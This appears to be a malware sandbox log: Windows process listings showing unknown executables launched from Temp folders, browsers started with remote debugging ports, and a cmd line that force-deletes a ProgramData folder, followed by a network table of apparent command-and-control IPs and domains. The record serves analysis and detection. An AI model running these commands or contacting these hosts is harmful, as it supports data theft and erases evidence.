"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xdc,0xe0,0xd4,0xd8,0x104,0x7ff80cf9cc40,0x7ff80cf9cc4c,0x7ff80cf9cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2040,i,8258268185607914036,3790390111347797027,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2036 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1872,i,8258268185607914036,3790390111347797027,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2056 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2260,i,8258268185607914036,3790390111347797027,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2276 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3084,i,8258268185607914036,3790390111347797027,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3192 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3200,i,8258268185607914036,3790390111347797027,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3232 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4540,i,8258268185607914036,3790390111347797027,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4568 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4676,i,8258268185607914036,3790390111347797027,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4700 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4304,i,8258268185607914036,3790390111347797027,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4656 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4308,i,8258268185607914036,3790390111347797027,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5104 /prefetch:8
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\10108220101\FvbuInU.exe
"C:\Users\Admin\AppData\Local\Temp\10108220101\FvbuInU.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4664,i,8258268185607914036,3790390111347797027,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5092 /prefetch:8
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4820,i,8258268185607914036,3790390111347797027,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4796 /prefetch:8
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5052,i,8258268185607914036,3790390111347797027,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5172 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5316,i,8258268185607914036,3790390111347797027,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5336 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5324,i,8258268185607914036,3790390111347797027,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5304 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4928,i,8258268185607914036,3790390111347797027,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4992 /prefetch:2
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff812d046f8,0x7ff812d04708,0x7ff812d04718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,749190989360635923,7117521668000021800,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,749190989360635923,7117521668000021800,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,749190989360635923,7117521668000021800,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2128,749190989360635923,7117521668000021800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2128,749190989360635923,7117521668000021800,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2128,749190989360635923,7117521668000021800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4892 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2128,749190989360635923,7117521668000021800,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Users\Admin\AppData\Local\Temp\10108230101\Ps7WqSx.exe
"C:\Users\Admin\AppData\Local\Temp\10108230101\Ps7WqSx.exe"
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\10108240101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10108240101\nhDLtPT.exe"
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\10108250101\3c78f9f7e6.exe
"C:\Users\Admin\AppData\Local\Temp\10108250101\3c78f9f7e6.exe"
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\10108260101\ca0811c1a0.exe
"C:\Users\Admin\AppData\Local\Temp\10108260101\ca0811c1a0.exe"
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Users\Admin\AppData\Local\Temp\10108270101\ab82191a65.exe
"C:\Users\Admin\AppData\Local\Temp\10108270101\ab82191a65.exe"
C:\Users\Admin\AppData\Local\Temp\10108270101\ab82191a65.exe
"C:\Users\Admin\AppData\Local\Temp\10108270101\ab82191a65.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 680 -ip 680
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 680 -s 812
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\vk6xl" & exit
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SysWOW64\timeout.exe
timeout /t 11
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\10108280101\99c35316e6.exe
"C:\Users\Admin\AppData\Local\Temp\10108280101\99c35316e6.exe"
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Users\Admin\AppData\Local\Temp\10108290101\a7e917a2f7.exe
"C:\Users\Admin\AppData\Local\Temp\10108290101\a7e917a2f7.exe"
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| GB | 2.18.66.80:443 | www.bing.com | tcp |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| NL | 45.144.212.77:16000 | 45.144.212.77 | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
| LU | 45.59.120.8:80 | 45.59.120.8 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| NL | 45.144.212.77:16000 | 45.144.212.77 | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | joyfulhezart.tech | udp |
| US | 8.8.8.8:53 | hardswarehub.today | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | hardrwarehaven.run | udp |
| US | 8.8.8.8:53 | techmindzs.live | udp |
| US | 8.8.8.8:53 | codxefusion.top | udp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| US | 8.8.8.8:53 | www.dropbox.com | udp |
| GB | 162.125.64.18:443 | www.dropbox.com | tcp |
| US | 8.8.8.8:53 | biochextryhub.bet | udp |
| US | 104.21.68.89:443 | biochextryhub.bet | tcp |
| US | 104.21.68.89:443 | biochextryhub.bet | tcp |
| US | 104.21.68.89:443 | biochextryhub.bet | tcp |
| US | 104.21.68.89:443 | biochextryhub.bet | tcp |
| US | 104.21.68.89:443 | biochextryhub.bet | tcp |
| US | 104.21.68.89:443 | biochextryhub.bet | tcp |
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | moderzysics.top | udp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| DE | 5.75.210.149:443 | tcp | |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | ls.t.goldenloafuae.com | udp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 8.8.8.8:53 | e5.o.lencr.org | udp |
| GB | 104.86.110.232:80 | e5.o.lencr.org | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.180.14:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 172.217.169.65:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.178.10:443 | ogads-pa.googleapis.com | udp |
| GB | 216.58.201.110:443 | apis.google.com | udp |
| GB | 142.250.178.10:443 | ogads-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.200.14:443 | play.google.com | tcp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | dawtastream.bet | udp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 8.8.8.8:53 | collapimga.fun | udp |
| US | 8.8.8.8:53 | seizedsentec.online | udp |
| US | 8.8.8.8:53 | strawpeasaen.fun | udp |
| US | 8.8.8.8:53 | quietswtreams.life | udp |
| US | 8.8.8.8:53 | starrynsightsky.icu | udp |
| US | 8.8.8.8:53 | earthsymphzony.today | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | farmingtzricks.top | udp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| CH | 185.208.156.162:80 | 185.208.156.162 | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 20.189.173.22:443 | nw-umwatson.events.data.microsoft.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 8.8.8.8:53 | towerbingobongoboom.com | udp |
| US | 213.209.150.137:4000 | towerbingobongoboom.com | tcp |
| US | 213.209.150.137:4117 | towerbingobongoboom.com | tcp |
| US | 213.209.150.137:4117 | towerbingobongoboom.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
